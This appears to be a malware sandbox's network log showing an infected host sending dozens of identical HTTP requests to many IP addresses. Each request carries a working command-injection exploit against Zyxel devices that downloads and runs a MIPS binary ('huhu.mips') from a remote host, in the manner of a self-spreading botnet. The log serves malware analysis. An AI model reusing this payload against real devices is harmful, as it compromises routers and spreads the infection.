                                                      Feb 2, 2024 06:35:42.406032085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1900192.168.2.144444278.210.153.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406063080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1901192.168.2.144101019.49.117.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406090021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1902192.168.2.1450138105.168.90.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406143904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1903192.168.2.1450884179.163.182.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406169891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1904192.168.2.1442682104.228.87.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406229973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1905192.168.2.144654845.44.127.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406251907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1906192.168.2.1453524223.95.144.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406318903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1907192.168.2.1436384173.86.192.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406359911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1908192.168.2.145869874.116.5.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406388044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1909192.168.2.145405892.67.105.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406434059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1910192.168.2.144691651.22.211.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406476021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1911192.168.2.1441112140.69.18.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406507015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1912192.168.2.1435514143.157.1.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406553984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1913192.168.2.1443726148.16.245.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.406596899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1914192.168.2.1454430125.116.41.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.418782949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1915192.168.2.1433848124.186.150.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.418817997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1916192.168.2.143682052.215.236.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.418874025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1917192.168.2.1440184122.90.181.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.418905973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1918192.168.2.1442312101.248.7.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.418936014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1919192.168.2.144365083.44.5.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.418972015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1920192.168.2.145136666.11.158.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419039011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1921192.168.2.1450036122.176.152.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419061899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1922192.168.2.14499902.130.230.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419099092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1923192.168.2.1445746176.94.89.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419151068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1924192.168.2.1446874207.249.168.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419190884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1925192.168.2.144900220.80.106.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419233084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1926192.168.2.143969891.125.43.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419269085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1927192.168.2.1450424200.193.86.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419329882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1928192.168.2.1451922186.39.129.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419358969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1929192.168.2.144299881.203.125.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419382095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1930192.168.2.143523898.98.11.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419430971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1931192.168.2.145058854.244.29.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419476986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1932192.168.2.1435096133.169.93.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419516087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1933192.168.2.1439198222.234.41.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419590950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1934192.168.2.144654095.85.86.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419636965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1935192.168.2.144978852.231.43.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419658899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1936192.168.2.1449604191.219.130.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419733047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1937192.168.2.1458350137.165.114.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419794083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1938192.168.2.145663061.141.218.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419810057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1939192.168.2.1437456158.92.23.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419840097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1940192.168.2.1456960158.84.163.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419873953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1941192.168.2.145866420.218.115.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419929981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1942192.168.2.1435910184.194.241.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419981956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1943192.168.2.1456366183.169.103.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.419998884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1944192.168.2.1454702175.158.35.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420068026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1945192.168.2.14587801.39.166.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420109034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1946192.168.2.143492240.92.172.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420129061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1947192.168.2.1440748202.96.18.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420161963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1948192.168.2.1449410203.127.44.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420218945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1949192.168.2.1433596103.248.32.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420252085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1950192.168.2.144246497.157.95.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420295000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1951192.168.2.1457594131.182.235.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420322895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1952192.168.2.1453368206.151.46.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420366049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1953192.168.2.1459218204.113.239.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420428038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1954192.168.2.145454891.17.75.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420479059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1955192.168.2.145233014.115.119.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420515060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1956192.168.2.1432780180.133.137.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420567989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1957192.168.2.144703899.140.159.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420633078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1958192.168.2.1459754170.67.32.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420670986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1959192.168.2.14385988.71.82.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420684099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1960192.168.2.1455400196.228.153.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420712948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1961192.168.2.143521295.226.54.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420767069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1962192.168.2.1459632114.243.202.181443
                                                      TimestampBytes transferredDirectionData
